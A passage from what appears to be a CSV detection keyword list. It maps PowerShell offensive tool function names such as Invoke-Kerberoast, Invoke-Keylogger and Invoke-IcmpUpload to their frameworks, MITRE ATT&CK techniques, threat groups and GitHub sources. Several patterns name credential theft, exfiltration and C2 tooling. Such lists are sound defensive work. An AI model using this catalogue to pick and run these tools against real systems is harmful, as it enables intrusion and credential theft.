- TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-HostEnum*","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*Invoke-HostRecon*","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. 
or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","401","114","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" +"*invoke-hostscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-HotFixVulnCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-IcmpDownload*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*Invoke-IcmpDownload.ps1*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data 
Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*Invoke-IcmpUpload.ps1*","offensive_tool_keyword","ICMP-TransferTools","Transfer files to and from a Windows host via ICMP in restricted network environments.","T1041 - T1001 - T1105 - T1205","TA0005 - TA0001 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/icyguider/ICMP-TransferTools","1","1","N/A","N/A","3","285","57","2022-01-27T16:53:44Z","2022-01-27T16:50:13Z" +"*Invoke-ImpersonateUser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik 
Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-InjectGEvent*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-InjectGEventAPI*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-InstalledProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-InstalledServicesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-InstalledServicesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Interceptor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Internalmonologue*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Internalmonologue*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Inveigh*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Invoke-Inveigh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
+"*Invoke-InveighRelay*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-InveighRelay.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-IR*","offensive_tool_keyword","Github Username","powershell forensic tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/Invoke-IR","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-IronCyclone*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Invoke-JSRatRegsvr*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-JSRatRundll*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-JuicyPotato*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-kerberoast *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invokekerberoast*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*Invoke-Kerberoast.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*Invoke-Keylogger.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework 
created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-KrbRelay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-LapsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-LapsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-LdapSignCheck*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-LdapSignCheck*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Lockless*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Locksmith.ps1*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*Invoke-LoginPrompt.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Invoke-LsaProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-LsaProtectionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-MachineRoleCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-MalSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-MalSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-MapDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Merlin.ps1*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - 